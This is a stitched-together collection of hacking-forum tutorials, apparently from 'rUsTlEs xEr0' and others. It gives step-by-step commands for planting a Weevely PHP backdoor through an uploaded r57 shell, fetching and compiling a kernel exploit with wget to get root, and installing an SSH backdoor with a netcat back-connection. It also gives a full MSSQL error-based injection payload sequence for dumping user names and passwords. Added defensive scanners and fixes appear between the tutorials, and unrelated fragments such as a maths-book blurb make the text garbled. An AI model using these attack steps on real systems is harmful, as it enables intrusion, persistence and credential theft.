0 A COURSE IN REAL ANALYSIS



Hi, it's a book about maths written by Subir Kumar Mukherjee. I hope you will enjoy this book.


By rUsTlEs xEr0


1 BackDoor & Rooting With Backtrack 5





By rUsTlEs xEr0




Assalam O Alaikum All!!
Today I'm going to post a tutorial related to backdoors via BackTrack 5.
For this you need a virtual machine with BT5 installed.
OK, now let's start.
Assume our target site: http://target.com/
We have already hacked the admin panel of the site via SQL injection. The site was vulnerable to SQL injection (assumption).

Admin panel: http://target.com/admin/index.php

After logging into the admin panel we uploaded our shell (r57.php).
Shell location on the server: http://target.com/uploads/r57.php

Now...
Run your VMware >> BackTrack 5...
The game starts now.
Backdooring a server with an encrypted PHP backdoor.. amazing!!


root@bt:~#
root@bt:~# cd /pentest/backdoors/web/weevely

Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/

Where
-p = your password to access the backdoor
-g = generate a new encrypted php file (it doesn’t actually encrypt the file, they encode it)
-o = specify your output file

root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o /root/Desktop/bdoor.php -p rustles

+ Backdoor file ‘bdoor.php’ created with password ‘rustles’.

Now go and check your desktop. There will be an encrypted PHP file, bdoor.php.

=>FireFox ---> http://target.com/uploads/r57.php ---> Upload bdoor.php
=>FireFox ---> http://target.com/uploads/bdoor.php ---> bdoor.php location

Now we have to connect to our encrypted bdoor.php


root@bt:/pentest/backdoors/web/weevely# ./main.py -t -u http://target.com/uploads/bdoor.php -p rustles

Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/

+ Using method ‘system()’.
+ Retrieving terminal basic environment variables .
[hacker@target.com/] ls
Index.php
admin
uploads
images
config.php
contact.php
Director listing Successful.

[hacker@target.com/] mkdir tmp
Directory tmp successfully created!!

[hacker@target.com/] cd tmp
[hacker@target.com/tmp] mkdir pcp

Directory pcp Successfully Created.

[hacker@target.com/tmp] cd pcp
[hacker@target.com/tmp/pcp] uname -r / -a

Linux 2.6.32 kernel (Assume)

[hacker@target.com/tmp/pcp]wget http://expoit-2.6.32.com/2.6.32.c
Downloading 2.6.32.c
File Transfer Complete -----------------100% ---------- 2.6.32.c
[hacker@target.com/tmp/pcp] ls
2.6.32.c
Directory Successfully listed.
[hacker@target.com/tmp/pcp] gcc 2.6.32.c -o hackall
-
-
done
[hacker@target.com/tmp/pcp] ./hackall
-
-

[hacker@target.com/tmp/pcp] id
uid=(root) gid=(root)
[hacker@target.com/tmp/pcp] Rooted ... Enjoy!!

Special Thnx to Hack All
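
Seen from the defender's side, this walkthrough leaves two artefacts on disk: an executable PHP file inside an upload directory, and a script whose body is encoded rather than readable. The check below is an added example, not part of the original post; the upload directory names, the indicator list and the constructed sample tree (including the inert `bdoor.php` look-alike) are assumptions.

```python
import os
import re
import tempfile

# Assumption: directories with these names hold user uploads and should
# never contain server-side scripts.
UPLOAD_DIR_NAMES = {"uploads", "upload", "images", "files"}
SCRIPT_EXTENSIONS = (".php", ".phtml", ".php5", ".phar")

# Calls an encoded PHP loader typically needs to rebuild and run its payload.
INDICATORS = {
    "dynamic_eval": re.compile(rb"\b(eval|assert|create_function)\s*\(", re.I),
    "decoder": re.compile(rb"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "string_rebuild": re.compile(rb"\bstr_replace\s*\(", re.I),
    "command_exec": re.compile(rb"\b(system|passthru|shell_exec|popen|proc_open)\s*\(", re.I),
}
# A long unbroken base64-alphabet run is unusual in hand-written PHP.
LONG_TOKEN = re.compile(rb"[A-Za-z0-9+/=]{200,}")


def inspect_script(path):
    """Return the names of the indicators found in one script file."""
    with open(path, "rb") as fh:
        data = fh.read(1_000_000)
    findings = [name for name, rx in INDICATORS.items() if rx.search(data)]
    if LONG_TOKEN.search(data):
        findings.append("long_encoded_blob")
    return findings


def scan_webroot(webroot):
    """Walk a web root and report scripts that sit in upload dirs or look encoded."""
    results = []
    for dirpath, _dirs, files in os.walk(webroot):
        rel_parts = os.path.relpath(dirpath, webroot).split(os.sep)
        in_upload = any(part.lower() in UPLOAD_DIR_NAMES for part in rel_parts)
        for name in files:
            if not name.lower().endswith(SCRIPT_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            findings = inspect_script(path)
            if in_upload:
                findings.insert(0, "script_in_upload_dir")
            if findings:
                results.append((os.path.relpath(path, webroot), findings))
    return sorted(results)


def build_sample_webroot(root):
    """Constructed sample tree; the 'backdoor' is an inert look-alike."""
    os.makedirs(os.path.join(root, "uploads"))
    with open(os.path.join(root, "index.php"), "wb") as fh:
        fh.write(b'<?php echo "hello"; ?>\n')
    with open(os.path.join(root, "uploads", "photo.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff\xe0 constructed image bytes")
    with open(os.path.join(root, "uploads", "bdoor.php"), "wb") as fh:
        fh.write(b'<?php\n$k = str_replace("#", "", "ba#se64#_de#code");\n'
                 b'$blob = "' + b"QUJD" * 60 + b'";\n?>\n')


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        build_sample_webroot(root)
        for path, findings in scan_webroot(root):
            print(path, findings)
```

A script in an upload directory is worth an alert on its own; the content indicators only help rank what to look at first.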



1 How To Root Server Very Detailed [Advance In Urdu]






[TUT]How To Root Server Very Detailed [Advance In Urdu]




How To Root The Server


Purpose
My name is Masoom Killer, and Dangerous Hacker is also my name on quite a few forums....
But today I will teach you something unusual, and in Urdu at that.
Perhaps some tutorial like this exists in Urdu, but I have never seen one to this day. I am writing this for those who understand Urdu, because I too was once at your stage and always used to request Urdu, but nobody took the trouble to write in Urdu. My comments must still be lying around, like this: "Please explain in Urdu", "It's good, but this tutorial should have been in Urdu". And anyway, this tutorial has been on the Internet in English for a long time. We are Pakistanis, which is why we only learn about these things once they have become common.
Anyway, let us come to our point...

What we will learn is for beginner (medium) hackers who can hack a website, that is, upload a shell, but do not know what to do with it. So I will teach you rooting: how to root the server.

First Of All Thanks To Google.com & PCA & ABH & HF And Other Hackers Who Helped Me


Come on, let's start

Answers to some questions

1=What is rooting??

Rooting is really reaching the main admin, that is, what this site's admin name is and how to bypass it; that is called rooting.

In simple words, gaining access to the user is called "root".....

2=What do we need for rooting?

1:-You should have a "shell upload", which I cannot give you...
2:-You should have an "exploit", which you can find in the exploit section...
3:-You should have a "log cleaner", which my friend will give you (What the hell, who is your friend):@ Simply Google.Com...
4:-You should have an "SSH backdoor"; this too is with my friend.....
5:-You should have "netcat"; this too you will get from my friend, that is, from www. Google .Com....
6:-You should have the "Putty" software, which you will get from your friend Google.com.....lol
7:-You should have a "brain", which is the most essential thing of all, and neither I nor Google can give it to you; only the "Quran" can give it....

First of all we will make a back connection from the server

For this

Go to Start, then Run, type cmd and press Enter, that is, you have to open the Command Prompt. Then type the location where you saved "Netcat". For example

You have saved netcat on the C:// drive, so you


Code:Cd C://
Then

Code:Cd netcat

Code:Cd Netcat.Exe
After this, go to the shell. Open the shell in Firefox or any browser, then click on Back Connection in the shell.
If it is not there, upload some shell such as "priv8.php or SyRiAn Sh3ll V7". "SyRiAn Sh3ll V7" is the best shell ...
Anyway, it is up to you, use whichever you like........

Enter your IP address, which will already be filled in the IP bar, then enter 2121 in Port and click Connect. With this you will have the shell on the server.
Then you can also give commands through the server on which the shell is present. It is your choice...

Now open the netcat window and give this command...

Code:nc -l -v -p 2121


This command will give you this output...
c:\netcat>nc -l -v -p 2121
Listning On 2121

Note:
You can use any open port; 2121 will do fine because it is an open port. Anyway, it's your choice....


2:-Exploit

Now we have to find the right exploit, which we will find out from this command

Go to the shell again and type there

Code:#Uname -a
And press the Enter button; you will see something like this

[admin@www.target.com /home/saijyoti/public_html/cgi-bin]$ uname -a
Linux dualxeon09.ns5.999servers.com 2.6.34-194.26.1.el5 #1 SMP Tue 2011 x86_64 x86_64 x86_64 GNU/Linux

You can see that the server's kernel version is 2.6.34 and the year is 2011. "It's for example"

Now you need a 2.6.34 2011 exploit, which you can now find easily
# from PCA, or Google, or any hack forum
Otherwise you will find it on the official websites,,,,,.....
# Leetupload.com
# Exploit-db.com
# Packetstormsecurity.org
# Th3-0utl4ws.com


Using the Exploit

How to use the exploit, that is, how to execute it

We have saved the exploit on the C: drive, but we have to upload it to the shell, and then it will need to be compiled. The exploit will not execute just by being uploaded. We have to "go to the tmp directory in the shell", because tmp is always a writable directory. So we will type this command in the shell


Code:cd /home/websitusername/public_html/tmp
The directory can also be different, for example
cd /home/websitusername/public_html/admin/tmp
cd /home/websitusername/public_html/image/tmp
and so on; it will be something like this


Then you have to execute the exploit on the server. For that


Code:Wget http :// exploitWebsite .com/ 2011-exploits / exploitname.c


Code:http: //exploitwebsite. com/ 2011-exploits/ exploitname.c
is not a real website; here you have to write the website where the exploit is.
For example, you can write the exploit download there......

After giving this command, the screen will look something like this



Code:admin@www.target.com /home/target_usernemr/public_html/tmp]$ wget http:// exploitwebsite. com/ 2011-exploits/ exploitname.c
--2011-09-22 05:12:14-- http://exploitwebsite.com/2011-exploits/exploitname.c
Resolving exploitwebsite.com... 199.58.192.192
Connecting to exploitwebsite . com|199.58.192.192|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16003(15K) [text/x-csrc]
Saving to: `exploitname.c'
Note:
199.58.192.192 is your IP address

Now the exploit has been saved on our shelled server. Now we have to change the exploit's permission to 777....

For this we will give the command

Type


Code:Chmod 777 ExploitName.c


Now the exploit is present on our server and under full control, that is, with full permission (777)...

Don't get happy yet.....

Now we have to compile and execute the exploit, which is done with this command.....

Type


Code:gcc -o Exploit Exploitname.c
This will compile, and the exploit will be saved as an exploit...

Then, as the next step, we have to execute the exploit with this command

Type

Code:./exploit
The server will reply to you that it has been rooted

Now we have to check whether it has really been rooted or not, so we have to give this command......

Type


Code:Whoami
This will answer you "root"

It will be something like this

uid=xxx(root) gid=xx(root) groups=xxx(root)



Then type this for full control

Type


Code:su
Ok Done!

Be quiet, don't get happy, the intermission has only just started...(Joking)

3:-SSH Backdoor

Now we have to install backdoors, so we have to give this command

Type


Code:#Wget http:/ / www. urlofbackdoor . com/ sshdoor.zip
Then, next, sshdoor.zip has to be unzipped

We will give this command to unzip

Type


Code:#Unzip Sshdoor.zip


Then, after it has been extracted, give this command
Type


Code:Cd Sshdoor
Then give this command


Code:./run yourpass port


In place of yourpass you have to give your password, and in place of port you have to write the port

Then you have to open Putty and connect with Putty ....

Now be happy, my friend; do whatever you want with the server, you now have full control of the server ..........lol

The commands used for installing the backdoor are these



Code:#Wget http : // www.urlofbackdoo r. com/sshdoor.zip
#Unzip Sshdoor.zip
#Cd sshdoor
#./run dangeroushacker 21
Thats All


To execute exploits in different languages, you can use these commands


C exploit

----------------------
gcc -o exploit exploit.c
chmod +x exploit
./exploit
----------------------

Perl Exploits

---------------
perl exploit.pl
---------------

Python

------------------
python exploit.py
------------------

php

-----------------
php exploit.php
-----------------

zip

----------------
unzip exploit.zip
./run
----------------

If someone still has not understood, then please do not ask me......


I wrote this tutorial myself with great effort, and credit for it also goes to the K4rl Team. If there has been any mistake, please forgive me and post it here....Thnx


Just for Education Purpose !!

Special Thnx to HackALL team... :)
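
Both this walkthrough and the BackTrack one above leave the same trail in process-execution telemetry: the web server's own account downloads a source file, changes its permissions, compiles it and runs the result from a writable directory. The detector below is an added example, not part of either post; the key=value log format, the account names, the host `files.example` and the thresholds are constructed assumptions.

```python
import os
import re
import shlex

WEB_ACCOUNTS = {"www-data", "apache", "nginx", "nobody"}  # assumption
WINDOW_SECONDS = 900   # events closer together than this form one burst
MIN_STAGES = 3         # distinct stages needed before alerting
SOURCE_SUFFIXES = (".c", ".pl", ".py", ".php", ".zip")
FIELD = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Constructed sample records (not a real audit log format).
SAMPLE_LOG = """\
ts=1316668300 user=apache cwd=/home/site/public_html cmd="uname -a"
ts=1316668334 user=apache cwd=/home/site/public_html/tmp cmd="wget http://files.example/exploitname.c"
ts=1316668350 user=apache cwd=/home/site/public_html/tmp cmd="chmod 777 exploitname.c"
ts=1316668361 user=apache cwd=/home/site/public_html/tmp cmd="gcc -o exploit exploitname.c"
ts=1316668370 user=apache cwd=/home/site/public_html/tmp cmd="./exploit"
ts=1316668400 user=deploy cwd=/srv/build cmd="gcc -o app main.c"
ts=1316700000 user=apache cwd=/var/www cmd="ls"
"""


def parse_line(line):
    """Parse one key=value record; return None if a required field is missing."""
    rec = {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
           for m in FIELD.finditer(line)}
    if not {"ts", "user", "cwd", "cmd"} <= rec.keys():
        return None
    rec["ts"] = int(rec["ts"])
    return rec


def classify(cmd):
    """Map a command line to a stage of the download/compile/run chain, or None."""
    try:
        argv = shlex.split(cmd)
    except ValueError:
        argv = cmd.split()
    if not argv:
        return None
    prog = os.path.basename(argv[0]).lower()
    args = argv[1:]
    if prog in {"wget", "curl"} and any(a.lower().endswith(SOURCE_SUFFIXES) for a in args):
        return "fetch_code"
    if prog in {"gcc", "cc", "g++", "make"}:
        return "compile"
    if prog == "chmod" and any(a in {"777", "+x", "a+x"} for a in args):
        return "make_executable"
    if argv[0].startswith("./"):
        return "run_local_binary"
    if prog in {"nc", "ncat", "netcat"}:
        return "netcat"
    return None


def detect(log_text):
    """Alert when a web account shows MIN_STAGES distinct stages in one burst."""
    per_user = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["user"] not in WEB_ACCOUNTS:
            continue
        stage = classify(rec["cmd"])
        if stage:
            per_user.setdefault(rec["user"], []).append((rec["ts"], stage, rec["cwd"]))
    alerts = []
    for user, events in sorted(per_user.items()):
        events.sort()
        burst = []
        for ev in events + [None]:          # None flushes the last burst
            if ev is not None and (not burst or ev[0] - burst[-1][0] <= WINDOW_SECONDS):
                burst.append(ev)
                continue
            stages = list(dict.fromkeys(s for _, s, _ in burst))
            if len(stages) >= MIN_STAGES:
                alerts.append({"user": user, "cwd": burst[0][2], "stages": stages,
                               "first_ts": burst[0][0], "last_ts": burst[-1][0]})
            burst = [ev] if ev is not None else []
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The same build steps run by a deployment account are ignored, which is why the alert keys on the account rather than on `gcc` alone; removing the compiler from web hosts and mounting writable directories `noexec` breaks the chain earlier.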


0 MSSQL Injection Method of Attack



By rUsTlEs xEr0


MSSQL - injection, method of attack!
###########################


1.1 Introduction
1.2 How to find a vulnerable page?
1.3 How to confirm that the site is vulnerable?
1.4 How to find the version / name of the DB?
1.5 How to discover the table names (table_name)?
1.6 How to discover the column names (column_name)?
1.7 How to get the data from the tables that interests us (e.g. name, pass, email, etc.)?
1.8 Conclusion



[1.1 Introduction]
############


This lesson tries to explain the different MSSQL injection techniques, including ones you may already know.
You will have the opportunity to learn how this method, a favourite one, is used to obtain information (name, password and login) or various other data.
MSSQL injection applies to products made by the well-known company Microsoft.
This type of injection therefore concerns sites that are coded in ASP / ASPX, etc.

There are several types of attack of this kind:

* - Normal MSSQL SQL injection attacks
* - MSSQL injection in web services (SOAP injection)
* - MSSQL injection with UNION
* - ODBC error message attack with "convert"
* - MSSQL blind SQL injection attacks, etc.


This write-up uses this type of attack:

ODBC error message attack with "convert"


[1.2 How to find a vulnerable page?]
############################


Finding a vulnerable page is easy. You can use the services of the giant company Google.

Let's open: Google


I write, for example: inurl: "products". "ID"
inurl: "neus.asp" menu "
inurl: "content.asp" under "
inurl: "games.asp" ID "
Etc. (I have picked some examples; you can now use logic to build better dorks.)


[1.3 How to confirm that the site is vulnerable?]
##################################


We can find out very easily by adding a single quote (') after the ID of the page.
If the page answers with an error, it is vulnerable. For example:


++++++++++++++++++++++++++++++++++++++
/ Microsoft Access ODBC driver /
++++++++++++++++++++++++++++++++++++++
/ Unclosed quotation mark /
++++++++++++++++++++++++++++++++++++++
/ Microsoft OLE DB provider for Oracle /
++++++++++++++++++++++++++++++++++++++
/ Division by zero in /
++++++++++++++++++++++++++++++++++++++


These are some of the most common responses shown by pages that are vulnerable to MSSQL injection.

Here is an example of where to put the single quote (').

For example:

----------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100'
----------------------------------------------------------------------


Now we can see that an error is displayed:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e14'

Unclosed quotation mark after the character string ') AND (Volgorde > 0) ORDER BY Volgorde'.

/MSN/shared/includes/main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


This page is vulnerable!
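
Why the quote test produces that error, and the two changes that remove it, shown as an added example that is not part of the original tutorial. It uses Python's sqlite3 as a stand-in for the ASP page and SQL Server; the `news` table, its rows and the function names are hypothetical, and only the `Volgorde` filter is taken from the error message above.

```python
import sqlite3


def make_db():
    """Constructed in-memory table standing in for the site's news data."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, volgorde INTEGER);
        INSERT INTO news VALUES (100, 'Launch day', 1), (101, 'Internal draft', 0);
    """)
    return db


def news_vulnerable(db, raw_id):
    """The pattern behind the error page: the id is pasted into the SQL text
    and the driver's error message is sent back to the browser."""
    sql = ("SELECT title FROM news WHERE (id = " + raw_id +
           ") AND (volgorde > 0) ORDER BY volgorde")
    try:
        rows = db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        # Echoing the parser error discloses part of the query to the client.
        return 500, "Database error: " + str(exc) + " in " + sql
    return 200, [row[0] for row in rows]


def news_hardened(db, raw_id):
    """Same page with the id validated, bound as a parameter, and errors kept
    on the server side."""
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        return 400, "Bad request"
    try:
        rows = db.execute(
            "SELECT title FROM news WHERE (id = ?) AND (volgorde > 0) ORDER BY volgorde",
            (int(raw_id),),
        ).fetchall()
    except sqlite3.Error:
        # Details belong in the server log, not in the response body.
        return 500, "Internal error"
    return 200, [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    for value in ("100", "100'"):
        print(repr(value), "vulnerable:", news_vulnerable(db, value))
        print(repr(value), "hardened:  ", news_hardened(db, value))
```

With the value bound as a parameter and driver errors kept out of the response, the `convert(int, ...)` requests in the following sections have no SQL to alter and no error text to read back.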


[1.4 How to find the version / DB name?]
############################


An example makes this easier to understand:

Version:

----------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100+or+1=convert(int,(@@version))--
----------------------------------------------------------------------


And we are shown, for example:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'MS SQL Server 2008 (SP1) - 10.0.2531.0 (64) 29. March 2009 10:11:52 Copyright (c) 1988-2008 Microsoft Corporation Edition (64-bit), the operating systems Windows NT 6.0 <x64> (Build 6002: Service Pack 2) (SM)' to data type int.

/MSN/shared/includes/main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


Now go and find DB_Name:

----------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100+or+1=convert(int,(DB_Name()))--
----------------------------------------------------------------------


e.g.


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'EVILZONE_CREW_DB' to data type int.

/MSN/shared/includes/main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


[1.5 How to discover the table names (table_name)]
######################################


Discovering, or simply finding, the table names of the site goes through this method.

For example:


----------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables))--
----------------------------------------------------------------------


And now there will be an error, such as:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'Users' to data type int.

/MSN/shared/includes/main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


That is, in this case the first table (table_name) is 'Users'. Now find the next table:

For example:


----------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users')))--
----------------------------------------------------------------------


Now the same kind of error message appears and gives another table:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'news' to data type int.

/MSN/shared/includes/main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


The second table in this case is 'news'.

Now, finding the third table (table_name) goes like this:

For example:


----------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users','news')))--
----------------------------------------------------------------------


The third table appears:


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'categories' to data type int.

/MSN/shared/includes/main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


So the third table is 'categories', and so on until you find all the tables.

For example:


----------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users','news','Categories')))--
----------------------------------------------------------------------


[1.6 How to discover the column names (column_name)]
###########################################


If you want the column_name values for 'users', go:

For example:


----------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users'))--
----------------------------------------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'Name' to data type int.

/MSN/shared/includes/main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


So the column name for the table (table_name) 'Users' is 'name'.

Now find the next column (column_name) in the same table 'Users':

For example:


----------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users' and column_name not in ('name')))--
----------------------------------------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'password' to data type int.

/MSN/shared/includes/main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


The second column name (column_name) is 'password'. Now go and find the next column_name:

For example:


----------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users' and column_name not in ('name','password')))--
----------------------------------------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'emailaddress' to data type int.

/MSN/shared/includes/main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


Therefore the third column_name is 'emailaddress', and so on until the end, to find all of the columns (column_name)!



[1.7 How to get the data that interests us (user name, pass, email, etc.)]
#####################################################


To do this, nothing is different from what we mentioned before.
In this section, all that needs to be done is to use the table (table_name) and the column names (column_name) found in the earlier results.

In this section we will use:
Table_name = Users
Column_name = user name, password, emailaddress!

Now substitute them, for example:


----------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 name from Users))--
----------------------------------------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'Administrator' to data type int.

/MSN/shared/includes/main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


user name : Administrator

Now replace the first column, "Name", with the second column, "password":

For example:


----------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 password from Users))--
----------------------------------------------------------------------

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value '123456' to data type int.

/MSN/shared/includes/main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


password: administratorpassword123

Now replace the column again; it works the same as above:

For example:


----------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 emailaddress from Users))--
----------------------------------------------------------------------


emailaddress: king.cyborg@yahoo.com

So we have obtained some information: the name, the password and the email address from the page.

user name: Administrator
password: administratorpassword123
emailaddress: king.cyborg@yahoo.com


[ 1.8 Conclusion ]
############


================================================== ===========================
www.localhost.com/news.asp?id=100'
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...(@@version))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...(db_name()))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users' , 'members')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users' , 'members' , 'categories')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 column_name from information_schema.columns where table_name='Users'))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('username')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('username' , 'password')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 username from Users))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 password from Users))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 emailaddress from Users))--
================================================== ===========================
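
The request sequence listed in this conclusion is easy to recognise in web server logs, because every step repeats `convert(int, ...)` against the same page and every answer is an HTTP 500. The summariser below is an added example, not part of the original tutorial; the W3C-style field layout, the client addresses and the log lines are constructed, and the phase names are my own labels.

```python
import re
from urllib.parse import unquote_plus

# Constructed W3C-style sample; addresses are from documentation ranges.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2012-03-01 10:00:01 198.51.100.7 GET /news.asp id=100 200
2012-03-01 10:02:11 203.0.113.9 GET /news.asp id=100' 500
2012-03-01 10:02:40 203.0.113.9 GET /news.asp id=100+or+1=convert(int,(@@version))-- 500
2012-03-01 10:03:02 203.0.113.9 GET /news.asp id=100+or+1=convert(int,(db_name()))-- 500
2012-03-01 10:03:30 203.0.113.9 GET /news.asp id=100+or+1=convert(int,(select+top+1+table_name+from+information_schema.tables))-- 500
2012-03-01 10:04:05 203.0.113.9 GET /news.asp id=100+or+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name=%27Users%27))-- 500
2012-03-01 10:04:40 203.0.113.9 GET /news.asp id=100+or+1=convert(int,(select+top+1+password+from+Users))-- 500
2012-03-01 10:05:00 198.51.100.7 GET /news.asp id=101 200
"""

CONVERT = re.compile(r"convert\s*\(\s*int\s*,")


def classify_query(raw_query):
    """Label one query string with the step of the tutorial it matches, or None."""
    q = re.sub(r"\s+", " ", unquote_plus(raw_query)).lower()
    if CONVERT.search(q) is None:
        # A value ending in a quote is only a low-confidence probe signal.
        return "quote_probe" if q.rstrip().endswith("'") else None
    if "information_schema.columns" in q:
        return "column_enumeration"
    if "information_schema.tables" in q:
        return "table_enumeration"
    if "@@version" in q or re.search(r"db_name\s*\(", q):
        return "fingerprint"
    if re.search(r"\bselect\b.+\bfrom\b", q):
        return "data_extraction"
    return "convert_probe"


def parse_w3c(text):
    """Yield one dict per log line, using the #Fields header for column names."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            parts = line.split()
            if len(parts) == len(fields):
                yield dict(zip(fields, parts))


def summarize(text):
    """Group suspicious requests by client and page, in the order phases appear."""
    clients = {}
    for rec in parse_w3c(text):
        phase = classify_query(rec.get("cs-uri-query", "-"))
        if phase is None:
            continue
        key = (rec["c-ip"], rec["cs-uri-stem"])
        entry = clients.setdefault(key, {"phases": [], "errors": 0, "requests": 0})
        entry["requests"] += 1
        if phase not in entry["phases"]:
            entry["phases"].append(phase)
        if rec["sc-status"].startswith("5"):
            entry["errors"] += 1
    report = []
    for (ip, stem), entry in sorted(clients.items()):
        # 5xx answers to convert() requests mean the error channel is open.
        leaking = entry["errors"] > 0 and any(p != "quote_probe" for p in entry["phases"])
        verdict = "enumeration_with_error_responses" if leaking else "probe"
        report.append({"client": ip, "page": stem, **entry, "verdict": verdict})
    return report


if __name__ == "__main__":
    for row in summarize(SAMPLE_LOG):
        print(row)
```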


Special Thnx to HackALL team


0 Learn how to get free skype credit !! (1000% working)





By rUsTlEs xEr0

